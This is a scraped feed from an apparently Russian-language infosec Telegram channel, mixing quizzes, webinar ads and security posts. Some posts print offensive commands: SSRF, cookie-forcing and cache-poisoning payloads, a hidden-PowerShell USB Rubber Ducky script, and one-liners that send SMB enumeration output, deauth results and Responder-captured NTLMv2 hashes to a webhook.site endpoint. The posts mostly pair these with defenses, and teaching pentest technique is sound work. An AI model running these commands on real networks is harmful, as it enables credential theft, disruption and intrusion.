This media is not supported in your browser
VIEW IN TELEGRAM
ХАКСЕТ .labs: практичная площадка для первых шагов в пентесте
👋 Приветствую в мире цифровой безопасности!
Ещё один инструмент, который может пригодиться тем, кто только начинает разбираться в ИБ.
⏺ Вход с нулём знаний: задачи идут от самых простых, чтобы понять базовую механику
⏺ Внутри уже 25 задач: каждая задача сопровождается видеоразбором
⏺ Живое комьюнити: где можно уточнить непонятные моменты или обсудить решение
⏺ Можно выкладывать свои задачи: это приятный бонус для тех, кто уже что-то умеет. Платформа растёт за счёт самих пользователей
ZeroDay | #Инструмент
Ещё один инструмент, который может пригодиться тем, кто только начинает разбираться в ИБ.
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🏆5🥰2⚡1😁1😍1
Что изменится, если сайт включает строгую политику HSTS?
Anonymous Quiz
26%
Браузер будет принудительно использовать TLS 1.3
49%
Браузер запретит любые попытки перейти на HTTP для этого домена
16%
Сервер начнёт автоматически отклонять старые сертификаты
8%
DNS-запросы будут отправляться только по DoH
👍8🤯4
Как делить зоны ответственности при работе в облаке?
На вебинаре 11 декабря в 11:00 по мск эксперты Cloud.ru и Cloud Advisor разберут модель разделения ответственности: расскажут, какие задачи лежат на провайдере, а какие — на команде клиента, и научат закрывать потенциальные угрозы.
Вебинар будет полезен всем, кто отвечает за развертывание и защиту инфраструктуры в облаке.
Зарегистрироваться
На вебинаре 11 декабря в 11:00 по мск эксперты Cloud.ru и Cloud Advisor разберут модель разделения ответственности: расскажут, какие задачи лежат на провайдере, а какие — на команде клиента, и научат закрывать потенциальные угрозы.
В программе:😶🌫️ почему модель разделенной ответственности — это база, и чем опасно ее игнорирование;😶🌫️ разбор зон ответственности на каждом уровне: что контролирует провайдер, а что — клиент;😶🌫️ какие инструменты предлагает Cloud.ru для защиты облачной инфраструктуры;😶🌫️ как комплексно обеспечить безопасность инфраструктуры в зоне ответственности клиента с помощью платформы CNAPP.
Вебинар будет полезен всем, кто отвечает за развертывание и защиту инфраструктуры в облаке.
Зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
3 приёма для веб‑пентеста
👋
⏺ Blind SSRF через favicon-hash: Подмена пути на /favicon.ico с редиректом на ваш сервер. Многие прокси разрешают favicon без проверки домена.
Если хэш favicon меняется, значит и SSRF-трафик точно дошёл до вас.
➡️ Защита: строгие allowlist доменов, отключение «favicon fallback».
⏺ Cookie-forcing через незаполненные поддомены: Если у домена есть
При следующем запросе браузер отправит ваши куки в реальное приложение, а это часто ломает auth‑логику.
➡️ Защита: запрет wildcard‑cookie, политика Host-Only, закрытие неиспользуемых поддоменов.
⏺ Cache-Poisoning через хитрый параметр: Многие CDN кэшируют URL вроде:
/api/user?nocache=1&x=
Если добавить пустой параметр или нестандартный разделитель (;, %00), CDN кэширует вашу версию ответа, а пользователь получает поддельный контент.
➡️ Защита: нормализация URL, запрет необычных разделителей, строгая политика кэширования.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу сегодня о трех полезных фишках именно для веб-пентеста.Если хэш favicon меняется, значит и SSRF-трафик точно дошёл до вас.
GET /favicon.ico HTTP/1.1
Host: internal.service
a.example.com, но нет b.example.com, вы можете поднять свой b. и выставить cookies на весь .example.com.При следующем запросе браузер отправит ваши куки в реальное приложение, а это часто ломает auth‑логику.
Set-Cookie: session=evil; Domain=.example.com
/api/user?nocache=1&x=
Если добавить пустой параметр или нестандартный разделитель (;, %00), CDN кэширует вашу версию ответа, а пользователь получает поддельный контент.
/api/user?nocache=1&x=%00inject
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍4🔥2
Как неверная настройка ACL может привести к потере контроля над системой?
Anonymous Quiz
56%
Доступ бывает открыт к важным функциям, которыми можно менять конфиг или данные
15%
Ошибка ACL всегда вызывает остановку всех сервисов ядра системы
9%
При неверных ACL автоматически отключается журналирование
20%
ACL не применяются к сетевым запросам и фильтрам пакетов
👍6
Как ИИ-сервисы обращаются с вашими данными в 2025 году
2025-й стал годом, когда политики обработки данных у ИИ-сервисов резко поменялись. Судебное решение против OpenAI, крупные утечки вроде более миллиона записей DeepSeek и новые требования к хранению данных, всё это заставило пересмотреть представление о том, что именно происходит с запросами, которые мы отправляем в модели.
⏺ В статье очень подробный разбор, как разные вендоры (OpenAI, Anthropic, Google, DeepSeek, GigaChat, YandexGPT, OpenRouter и инструменты для кодинга) хранят данные, используют ли их для обучения, чем отличаются пользовательские и корпоративные режимы и какие были реальные инциденты в 2025 году.
ZeroDay | #Статья
2025-й стал годом, когда политики обработки данных у ИИ-сервисов резко поменялись. Судебное решение против OpenAI, крупные утечки вроде более миллиона записей DeepSeek и новые требования к хранению данных, всё это заставило пересмотреть представление о том, что именно происходит с запросами, которые мы отправляем в модели.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍3
USB Rubber Ducky: библиотека полезных пейлоадов
👋
⏺ USB Rubber Ducky - это флешка, которая притворяется клавиатурой.
Вы вставляете её в ПК, и она мгновенно начинает вводить команды с нереальной скоростью. А официальный репозиторий usbrubberducky-payloads - это огромная библиотека готовых DuckyScript‑пейлоадов: от быстрого recon до автоматизации рутинных задач.
⏺ Пейлоады пишутся на DuckyScript 3.0: теперь это полноценный мини‑язык с функциями, циклами, режимами HID/Storage, рандомизацией, OS‑детекцией и расширениями.
⏺ Работать удобнее всего через PayloadStudio - это веб‑IDE с автокомплитом, встроенными расширениями и компиляцией в inject.bin. Написал payload.txt → собрал → вставил «утку» → получил автоматизацию уровня «вставил и ушёл».
⏺ Пример минимального пейлоада (авто‑recon):
Компиляция и загрузка
Структура репозитория
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.
Вы вставляете её в ПК, и она мгновенно начинает вводить команды с нереальной скоростью. А официальный репозиторий usbrubberducky-payloads - это огромная библиотека готовых DuckyScript‑пейлоадов: от быстрого recon до автоматизации рутинных задач.
DELAY 500
GUI r
STRING powershell -nop -w hidden
ENTER
DELAY 700
STRING whoami; ipconfig; systeminfo | Out-File C:\recon.txt
ENTER
Компиляция и загрузка
# Собрать payload через PayloadStudio
# Файл inject.bin скопировать в корень "утки"
Структура репозитория
payloads/
├── recon/
├── exfiltration/
├── remote_access/
└── privesc/
languages/
extensions/
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝7❤6🔥2
Успеете защититься, пока киберугрозы не стали ближе?
В 2025 году хакеры используют новые схемы и находят бреши там, где ещё вчера их не было.
18 декабря эксперты F6 покажут во время вебинара, каким стал Managed XDR: какие инструменты помогут быстро обнаружить и отразить современные атаки, как работать с дорожной картой безопасности и что реально внедрять в вашей компании.
Живая демонстрация, ответы на вопросы — всё ради вашего спокойствия и контроля над ИТ-инфраструктурой.
Регистрируйтесь — количество мест ограничено!
#реклама
О рекламодателе
В 2025 году хакеры используют новые схемы и находят бреши там, где ещё вчера их не было.
18 декабря эксперты F6 покажут во время вебинара, каким стал Managed XDR: какие инструменты помогут быстро обнаружить и отразить современные атаки, как работать с дорожной картой безопасности и что реально внедрять в вашей компании.
Живая демонстрация, ответы на вопросы — всё ради вашего спокойствия и контроля над ИТ-инфраструктурой.
Регистрируйтесь — количество мест ограничено!
#реклама
О рекламодателе
👻1🎃1🦄1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24❤3🔥1😁1🍌1
Супероружие, которое взорвет интернет - ботнет AISURU
👋
⏺ AISURU вырос с ~6 до ~30 Tbps за месяцы. Это уже полноценный инфраструктурный ботнет, который способен давить даже сетевые магистрали и CDN. Мощность у него распределена по тысячам подсетей, поэтому трафик выглядит как нормальный глобальный шум, что усложняет фильтрацию 😬
⏺ Рост обеспечен автоматизированной цепочкой заражений: а именно сбор свежих CVE для SOHO‑роутеров, массовые сканеры, точечная эксплуатация и самораспространение. Ботнет ставит агента поверх уязвимого фреймворка, убирает конкурентов, закрепляется в системе и сразу встраивается в общую командно‑управляющую сеть.
⏺ Внутри команды есть чёткое разделение: одни занимаются поиском багов, другие — созданием эксплойтов под новые модели оборудования, третьи - построением прокси‑цепочек и инфраструктуры управления. За счёт этого AISURU стабильно пополняет «флот» и быстро адаптируется под патчи производителей.
⏺ Технологически ботнет еще как отличается от обычных Mirai‑форков: у него есть продвинутое обнаружение honeypot‑ловушек, динамическое переключение IP‑пула, методы обхода фильтрации, а также авто‑тюнинг под конкретный DDoS‑вектор (UDP‑flood, TCP‑flood, amplification‑варианты).
⏺ Текущие цели ботнета такие: игровые платформы, облачные провайдеры, телеком‑операторы, крупные SaaS‑сервисы. Главное отличие AISURU - он продаётся как услуга, поэтому характер атак постоянно меняется: оператор подстраивает сценарий под защиту конкретной жертвы, что увеличивает эффект от атак.
ZeroDay | #история
Приветствую в мире цифровой безопасности!Расскажу, почему AISURU стал настолько серьезным ботнетрм и чем он отличается от классических IoT‑ботнетов.ZeroDay | #история
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯14❤6🤔3👎1🍓1🤝1
Приглашаем в канал AI Inside
Канал для тех, кто смотрит на искусственный интеллект не как на хайп, а как на рабочий инструмент. Здесь нет абстрактных теорий — только прикладные решения.
Что вас ждет:
✔️ Технологии: расскажем, как ИИ решает реальные бизнес-задачи — от автоматизации до аналитики.
✔️ Кейсы: покажем успешные примеры внедрения и использования ИИ-инструментов.
✔️ Экспертиза: объясним сложные технологии простым языком с фокусом на практическую пользу.
Наша цель — дать конкретные идеи и инсайты, которые можно применить уже сегодня.
Присоединяйтесь к сообществу практиков
Канал для тех, кто смотрит на искусственный интеллект не как на хайп, а как на рабочий инструмент. Здесь нет абстрактных теорий — только прикладные решения.
Что вас ждет:
✔️ Технологии: расскажем, как ИИ решает реальные бизнес-задачи — от автоматизации до аналитики.
✔️ Кейсы: покажем успешные примеры внедрения и использования ИИ-инструментов.
✔️ Экспертиза: объясним сложные технологии простым языком с фокусом на практическую пользу.
Наша цель — дать конкретные идеи и инсайты, которые можно применить уже сегодня.
Присоединяйтесь к сообществу практиков
❤6❤🔥2👍2🔥1💋1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для веб-пентестинга
👋
⏺ Быстрое перечисление SMB-шар без кредов + отправка результатов на webhook: собирает пользователей, шары и политики, логирует удаленно.
⏺ Wi-Fi deauth-атака с подтверждением через webhook: отключает клиентов от AP, пинг на webhook подтверждает успех (клиент reconnect’ится и триггерит).
⏺ LLMNR/NBT-NS poisoning с захватом хэшей + webhook-лог: отравляем запросы в сети, ловим NTLM-хэши и сразу шлем на webhook для оффлайн-кракинга.
➡️ Защита: отключить SMBv1/guest, мониторить 445/139, использовать WPA3 + PMF, отключить LLMNR/NBT-NS/mDNS, предпочитать unicast DNS.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте сетевых протоколов и Wi-Fi и защите от них.crackmapexec smb target.example.com –shares –users –pass-pol | curl -s -X POST https://webhook.site/your-id –data-binary @-
airodump-ng wlan0mon # найди BSSID и клиент aireplay-ng -0 10 -a BSSID -c CLIENT_MAC wlan0mon && curl -s https://webhook.site/your-id -d “deauth_success=$(date)”
responder -I eth0 -v | grep “NTLMv2” | curl -s -X POST https://webhook.site/your-id –data-binary @-
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥3🤡2❤🔥1👍1
Что означает риск Race Condition в приложении?
Anonymous Quiz
69%
Несколько потоков могут одновременно менять общий ресурс непредсказуемо
13%
Пользователи могут выполнять запросы без авторизации и контроля доступа
12%
Сервер создаёт конфликт данных между разными профилями пользователей
6%
Приложение теряет логи, если выполняется сильная нагрузка на диск
👍8🔥1🕊1
Media is too big
VIEW IN TELEGRAM
Разбираем базовые правила киберзащиты
👋
⏺ Самый простой способ сохранять информационную безопасность на высоком уровне — это наличие отдела кибербезопасности, который отслеживает получаемые угрозы.
⏺ Однако не всегда ресурсы компании позволяют нанять профессионалов — тогда помочь может чек-лист требований, которые обязательно нужно соблюдать, чтобы избежать успешных атак.
⏺ Составили такой список для небольшой IT-компании вместе с ИИ-помощником Гигачат. Слушайте и сохраняйте.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о том, как компаниям защитить себя.ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👏3❤2🌚2❤🔥1🔥1
Samba в домене: где появляются скрытые точки эскалации
👋
⏺ Частая история: Samba поднимают для обмена файлами, добавляют пару ресурсов, меняют права, и всё остаётся так навсегда. Со временем появляются папки с лишним доступом на запись, забытые тестовые директории и неправильные ACL. Именно в таких местах и начинается эскалация.
⏺ Смотрим, что реально доступно юзеру: надо обнаружить каталоги, куда неожиданно можно записывать файлы, или ресурсы, которые раскрывают структуру домена больше, чем нужно.
⏺ Проверяем чувствительные каталоги: особенно те, где лежат скрипты, конфиги или файлы, которые используются системными сервисами. Возможность изменить такой файл превращается в скрытую точку повышения привилегий.
⏺ Следим за изменениями в конфигах: новые ресурсы и мелкие правки в smb.conf - частая причина появления слабых мест. Проще включить наблюдение за конфигом и фиксировать каждое изменение.
ZeroDay | #samba
Приветствую в мире цифровой безопасности!Сегодня расскажу, как ресурсы Samba часто становится незаметной лазейкой внутри домена.smbclient -L //server
smbmap -H server
smbmap -H server -R /path
smbclient //server/resource
auditctl -w /etc/samba/smb.conf -p wa -k sambawatch
ausearch -k sambawatch
ZeroDay | #samba
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥3❤1👏1
Следующий виток развития кибереза: мультиагентные атакующие системы защиты
👋 Приветствую в мире цифровой безопасности!
Расскажу о ландшафте кибергуроз и способах митигации уязвимостей будущего
⏺ В 85% кибератак в мире будет задействован ИИ уже к следующему году. О том как бизнесу противостоять современным киберугрозам, рассказал в интервью «Ведомости» вице-президент по кибербезопасности Сбера Сергей Лебедь.
⏺ Более 50% компаний России уже столкнулись с атаками хакеров. Традиционно в их арсенале DDoS-атаки и вредоносное ПО, но атаки становятся все более и более мощными, в том числе благодаря ИИ. Это известное противостояние "пули и брони" в отрасли. Но что же делать?
⏺ Для дальнейшей эффективной защиты необходимо развивать ИИ в трех ключевых направлениях кибербезопасности: для автоматизации реагирования, для автоматизированной безопасной разработки, а также в рамках ассистентов и копайлотов, которые компенсируют недостаток знаний экспертов и увеличивают скорость получения и обработки данных командами (или то и другое).
⏺ Для защиты нужно разрабатывать автономные мультиагентные системы. Они уже в скором будущем станут залогом киберустойчивости. Сбер уже разработал и внедрил такую: одна ее часть — атакующая, она в близком к реальному времени режиме эксплуатирует угрозы в безопасной среде банка. Другая — защищающая, которая учится на основе этого опыта и корректирует процессы реагирования.
⏺ Для повышения уровня кибербезопасности в России в Сбере год назад открыли для отечественных компаний платформу X Threat Intelligence, к которой уже подключилось более 500 компаний страны. На платформе в течение двух часов появляется инфа о любой появившейся в мире уязвимости, а также способы ее устранения.
ZeroDay | #Инструмент
Расскажу о ландшафте кибергуроз и способах митигации уязвимостей будущего
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3👏3🤣1
Какой признак наиболее характерен для Pass-the-Hash?
Anonymous Quiz
18%
Много 4625 (неуспешные логины)
55%
Успешные NTLM-логины, когда используется хеш
17%
Kerberos TGT с очень долгим TTL
9%
Массовые блокировки (4740)
🔥4⚡3🤷♀2❤1
Формат файлов, который не удаётся взломать уже 20 лет
Файлы🤷♂️
⏺ В статье разбирают, как устроены
ZeroDay | #Статья
Файлы
.lin из игры Splinter Cell выглядят как типичный архив с уровнями, текстурами и моделями, но на деле всё ох, как хитрее. Странные адреса загрузки, непоследовательные смещения, «лишние» данные и таблицы файлов, которые не совпадают с реальными файлами, из-за этого привычные способы распаковки не работают. За двадцать лет ни один реверсер так и не смог полностью извлечь содержимое .lin: маленькие блоки сжатых данных, таблицы с информацией о файлах, особая логика загрузки в Unreal Engine 2, и почему стандартные архиваторы здесь бессильны. Плюс, как отладка игры через эмулятор Xbox помогает увидеть, как игра реально читает данные.ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5